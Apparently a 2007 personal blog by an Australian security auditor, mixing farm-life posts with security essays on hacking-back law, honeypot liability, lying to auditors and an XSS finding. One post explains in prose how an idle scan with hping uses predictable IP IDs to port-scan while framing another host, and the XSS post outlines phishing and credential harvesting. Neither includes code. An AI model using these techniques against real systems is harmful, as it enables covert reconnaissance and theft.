Saturday, 24 November 2007

A short weekend...

Today is a short weekend.
I was interstate this week with work and only arrived back into Sydney on Saturday. The animals on the farm need to be fed and checked. Fencing is always an issue with cattle. At the minimum I have to do a quick run up to ensure that there are no problems.

At the same time I feed the animals (and even spill a little for the locals from time to time). A little shade helps. The locals are friendly.

The summer is upon us and the fruit trees are ripening. The tamarilo are green, but large and will be ready to harvest in a few weeks. They are also called tree tomatos and have a flavour nothing like a tomato. They are great to cook with.

The citris are also getting large, though they have a while before they are ripe.

There was no time to plant a crop this year. I had a few medical issues (Hernia for instance) that stopped my efforts at planting.

So the farm will lie fallow for the year and I will prepare for a larger harvest next year.

Such is life, I usually have good crops with zucchini (marrow), pumpkins, squash and sun flowers (canola). I have tried corn, but the wildlife and corn do not mix. Also, trying to keep cattle out of corn is a task.

Friday, 23 November 2007

IP ID, or How an attacker can blame someone else

Using a tool called hping an attacker can scan a server without revealing their IP address. In fact, they can make it appear in the logs that another host preformed the scan. (NMAP can also be used for idle scans).
A commonly held belief is that a port scan requires the attacker to give up their real source IP address in order to complete a port scan. It is assumed that using an alternate address other then your own will mean that you cannot obtain the information from the system to see what ports are open.
Unfortunately this is not the case.
Using hping, the attacker can run an idle scan. Idle scans make use of predictable IP ID’s. Linux, Solaris, and OpenBSD have patched (if it is applied) the IP ID problem. Windows remains vulnerable.
The attacker initially scans for a host with a sequential and predictable IP ID (this is our kludge). When a kludge is discovered, the attacker will send a packet with the SYN flag set to the target host while spoofing the source address to appear as if the packet originated at the kludge.
If the port is open on the target, the host will respond with a packet that has the SYN/ACK flags set. This packet is returned to our kludge.
The kludge will respond by sending a packet with the RST flag set to state that it did not send the packet and does not understand why the host being attacked has sent it a packet. Sending this packet will increment the IP ID of the kludge.

If the IP ID does not change, the port being probed is closed.

If the IP ID has an increment change, the port being probed is open.
Using this method, the attacker can discover open ports on the target and have another host take the blame. Analysing the IP ID will show the attacker that a particular port is close if there was no incremental change and open if the was a change.

What can you do? Randomize your IP ID. Unfortunately this means playing with the stack, but it is a possibility. It also means that you can not just assume that the host that is scanning you is actuially scanning you. So hold off on the active defence!

Thursday, 22 November 2007

Attacking back - what is too far?

Bruce Schneier, has stated "A cybersecurity policy that condones both active deterrence and retaliation -- without any judicial determination of wrongdoing -- is attractive, but it's wrongheaded, not least because it ignores the line between war, where those involved are permitted to determine when counterattack is required, and crime, where only impartial third parties (judges and juries) can impose punishment." (in "Vigilantism Is a Poor Response to Cyberattack," WIRED)

So your company is enduring a structured cyber-attack. You are undergoing a distributed system scan from a number of “real” and decoy hosts using Nessus with all the dangerous attacks enabled and a variety of “black” tools. A scan of the hosts will help you determine which of the attacker’s addresses are real and which are spoofed. What do you do?

In responding, remember that a limited number of careful measures including a number of simple tests can be consistent with the rule of law. There are a number of valid tests that may be conducted in order to isolate the real hosts from the spoofed ones. Such an example would be pinging the host to see if is active or other similar tests. This would allow you to add ingress filters to block the ongoing attack and start to recover your systems.

emember though, that there are rarely absolutes and it is likely that an exception to the law may be found. For instance, Self-defense and justifications of necessity may apply in extreme cases. Such a case could involve a situation where a loss of life was likely if the attack occurred. Such a condition could occur in hospitals, critical infrastructure and similar situations. This takes us to the problem with beliefs such as “as this is self-defense you can attack in order to repel the attack” and “You should attack-back as this will deter future incidents and make the attacker know you are serious about security”.

Although self defense and necessity are valid justifications, they are limited. If there is a simple way to stop the attack without attacking back, this would negate the legality of attacking back in full. As a number of tests to determine the legitimacy of the attacker may be used to create a filter, the defense of necessity (etc) are inadequate.

The key is to seek legal advise prior to the incident. Use this to formulate an incident response process and have it in place before it is needed, not as it is happening.

Wednesday, 21 November 2007

Honeynets and the law

Take it too far and you may end up being the criminal!

In investigating the use of a Hoyeypot, or Honeyney, you need to look to the possibility that your actions (the running of the system) is "an incitement to commit a criminal act". This issue has been addressed before. For instance Overill (2003);

"In the cyber-defence context, it should be noted that the use of ‘honey-pots’ for enticing or entrapping intruders,[1] in order to determine their identities and monitor their techniques at close range, raises an interesting issue: it is at least possible that the use of a honey-pot might be held to constitute an incitement to commit a criminal act; as such it might render the deployer, rather than the intruder, liable to prosecution." [2]

In the UK's Computer Misuse Act it is stated that;
"On a charge of incitement to commit an offence under this Act the question where the incitement took place is immaterial to the accused’s guilt."

Further issues arrise if the attacker uses the honeynet to launch another attack against an external site, you may be in effect "aiding, abetting, counselling or procuring commission of an offence". This was addressed by Hilary E Pearson in 1996 in "LIABILITY OF INTERNET SERVICE PROVIDERS". These issues are not in fact new or unaddressed legally as many believe.

Even Richard Salgado, the legal council for the honeypot project and formerly an attorney with the Dept. of Justice (US) has stated on a number of occasions that honeypots are questionable from a legal perspective and setting one up for the purposes of monitoring an attacker is risky. There are exceptions under the Patriot Act for US Law enforcement, but this does not help a company or an individual in the US, just the government.

Pearson (1998) in "Intellectual Property and the Internet. A Comparison of U.K. and U.S. Law" [3] also addressed this issue further. In fact, the issue of honeynets where in fact addressed over 5 years before Lance Spitzner came out with "Know Your Enemy". Pearson stated that; "To establish incitement, it must be proved that the defendant knew or believed that the person incited has the necessary mens rea to commit the offence, but as the mens rea for an offence under Section 1 of the Computer Misuse Act is merely that the defendant intends to secure access to a program and knows that such access is unauthorized, this will probably not be too difficult to establish. "

Likewise, Hillary (1998) argued that;
"An alternative approach is to charge the Internet host with aiding, abetting, counselling or procuring commission of an offence. In each case, the defendant must have the intention to do the acts which he knows to be capable of assisting or encouraging the commission of a crime, but does not actually need to have the intent that such crime be committed. "

From this it is easy to see that a honeynet can expose a company to a level of risk that they may not want to accept for the level of gain. In running a honeynet, you are effectively stating you have the intention to monitor and watch while the attacker commits a crime. This in itself is a crime as you have procured the means and have provided an incitement to the attacker in keeping them on the Honeynet to learn their methods.

The 4th amendment in the US, this protects against Protects against unreasonable searches and seizures. This is commonly quoted as a defense to these types of charges. Unfortunately it does not have a great deal of relivance to private honeynets, "Section 1029. Fraud and related activity in connection with access devices", USA does. In particular the section to the effect; "if any of the parties engages in any conduct in furtherance of such offence, shall be fined an amount not greater than the amount provided as the maximum fine for such offence under subsection (c)".

So although Honeynets are a great learning tool if run correctly, I see little business value in them. The effort to maintain a 24x7 presence to ensure that they do not get out of control allowing an attacker to "bounce" attacks to a third party (for instance) is too great for the benifits gained. A well configured IDS in more places is going to offer a better return on investment.

So although I run 2-3 honeynet projects a year myself, there is no way that I would affiliate them with my employer.

I have included some sites if you are interested in reading more about honeynet legalities.



  • [1] Spitzner, L. (ed.) (2001) Know Your Enemy,Addison-Wesley-Longman; Honeynet project at

  • [2] Overill, Richard E. (2003) "Reacting to cyber-intrusions: the technical,legal and ethical dimensions" J.F.C. 2003, 11(2), 163-167

  • [3] Pearson, Hillary E. (1998) "Intellectual Property and the Internet.A Comparison of U.K. and U.S. Law" The Journal of World IntellectualProperty 1 (5), 827-840. doi:10.1111/j.1747-1796.1998.tb00038.x

Tuesday, 20 November 2007

Lying to the auditor is a crime.

In Australia as with many western nations, lying to the auditor is a criminal felony.

From time to time in an audit I will ask questions of people who do not know me or have not had an audit with me before. One issue that is often misunderstood is that the audit standards (for those of us involved in audits under the Australian Standards at least) require that all assertions are validated. An auditor can not just take your word that all is ok. If you make an assertion, we have to test it. On the other hand, if you state that your system is hopelessly inadequate and has few controls, we can take your word on that negative assertion.

So when you state to an auditor, “I patched the firewall on the 3rd of March with the latest patches”. Please tell us the truth as we have to test your assertions and can not just take your word.

Now worse than just annoying the auditor who is going to go hard on you if you have lied, there is the possibility of a criminal action.

If we take a look at the Commonwealth (Australia) Corporations Act:
False information etc.

(1) An
officer or employee of a corporation who makes available or gives information, or authorises or permits the making available or giving of information, to:

Drilling down we see that by telling the auditor something that you know is false is a crime. Worse then this is that which is covered in Section 2. It states:

(2) An officer or employee of a corporation who makes available or gives information, or authorises or permits the making available or giving of information, to:

What this means is that you can be guilty if you thought the information was correct, but that you did not yourself verify it. That is you can be criminally liable for being negligent. When you tell the auditor about your systems, you have to ensure that you supply accurate data.
So why do we need a change control system? I think that the answer is self-evident, but it is only the simplest of IT shops that have a single person who knows all that is going on, and even then it is usually that they believe what is the case, not what is fact.

Some of us (auditors) are starting to have a clue. So let's hope that we all start to be more honest in an audit.

Monday, 19 November 2007

Cross Site Scripting (XSS) - You need a victim! (or do you)

A couple weeks ago I was involved with an audit of a client who had received the all clear from a Pen Test company here in Australia who had no idea about Cross Site Scripting [XSS]. What is really sad is that they are one of the largest testing firms. [Names have not been included to protect the guilty].

In their report to a financial services and payment processing company it was stated that:
"A XSS vulnerability was found on the server but no known way to exploit this is known". Well maybe not be them!

The machine with the XSS vulnerability was a F5 VPN gateway. It was configured to map the payment processes. It had been running following this test unpatched since Feb as it was stated to be secure.

OWASP states that:
"Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it."

Hence why I decry Pen Testing in favour of audit. Even with a clueless auditor, patching would have been validated and the issues would have been fixed months earlier. In this case, the company was lucky (we hope). Maybe next time it will not be this way.

You may ask, but how could this be exploited?

The simple answer would be to send an email to the many clients spoofed to seem to come from the payment processing firm. A number of their clients are likely to respond. The XSS vulnerability would then reflect a script in the spoofed correspondence and stolen cookies, internal scanning, access as that user,… All are a possible result.

More simply however, the F5 had a vulnerability at the same time that would allow an attacker to alter its main logon page. Changing the main login page would allow the attacker to run a harvesting script directly from the web server. They could filter requests and only attack the administrator. Basically, the game was won for the attacker. If they discovered it. The question is out on this one.

For information on Cross site scripting see:

Sunday, 18 November 2007

Back to Bagnoo

Another weekend
It always seems to be running away from us. Leaving the scene so to speak.

In case you have not guessed, we have cattle on the property. Beef cattle, hamburgers and prime rib just waiting to be processed. (I am not a vegetarian in case it is not blatently obviously evident!)

So these are the cattle (or a SMALL fraction of them) on the property.
The property is not flat by any means, but we like it this way. It is more private, but you can also forget a mobile phone signal.

We (the wife and I) have a little over 520 acres all up. It is about 75% cleared and we have made a small (100 acres or so) timber plantation.

We have Hardwoods, Red Cedar and a number of furniture timbers. These are our retirement (not for a long time, but then timber takes a long time). In case you did not notice, I plan ahead.

We have 3 horses and a donkey. I am not into trail bikes or quads, too noisy and damned dangerous on hill country (i.e. our property).

The horse to the right is "Flame". A bastard mean son of a... at times, but that is how I like him. I will feature the others in later posts.

Flame is a quarter horse. This means he has a penchant for chasing cattle. This is - he does what he wants. If you are on his back, you are along for the ride and he does the work. If he wants you off, he goes head down at a gallop through trees.

He does like the chase though.
On Saturday I had a picnic at about 13.30 down near one of the creeks. The one here has a small rain forest (sub tropical) outlook and is recovering nicely (it was logged about a decade prior to our taking over the farm in 2001).

The water is clear and clean and there is a good varity of wild life.

My Saturday morning when I do not have to go into town for supplies consists of the following:

  • Study (there is always something). I have my LLM to complete by Feb and I have started psychology as a Summer session.
  • Paper writing (I have 2 submissions due at the end on the month for some journals). I have 5 papers of a total 65,000 words by christmas that are due. There is also the submissions and the FBI crime survey is out - and this needs to be picked on as it is flawed (again).
  • Writing (books - I have 7-8 pages a day to complete to stay on schedule and met my contracts).
  • Next, I have to feed and water the animals. This is a few hours. Collecting the eggs also occurs at the same time (farm fresh).
  • The task I hate (loath) is when the pens need cleaning - not a job for the feint hearted. Let me tell you, moving a dead animal is bad, but muching out the pens is worse. The fun of a farm...
Some local wild life.
We found an Echidna (or spiny ant eater) while we had the picnic.

This is not ther same Echidna that was described by Hesiod as a female monster spawned in a cave, who mothered with her mate Typhoeus (or Typhon) every major monster in the Greek Pantheon.

Rather, the animal pictured is not an escape from Criters IX, rather it is an Australian monotreme.

I enjoy having them around. For a start they eat termites. Echidna are a natural part of the environment here and they provide us with an indictation that the land is healthy.
Don't for a moment think I am some raving hippy, I plan to be here in 50 years (if I live that long). As a consequence, I believe in the good stewardship of the land. It is all about the long term. In the long term I will also make more money from the land this way.
So there are valid economic arguements to this approach. Most people just want the quick return though.

General scenes from the property.

At the current time we have been in a high rainfall section of the cycle. Things are green and starting to go well.
This is far better then the last 5 years of drought.
Soon I have to leave again...
Well, until next week...